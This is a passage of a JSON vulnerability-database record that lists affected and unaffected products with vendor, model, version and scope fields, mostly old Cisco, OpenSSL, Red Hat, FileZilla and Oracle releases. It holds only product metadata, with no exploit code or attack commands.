            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.48"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.47"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.22"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
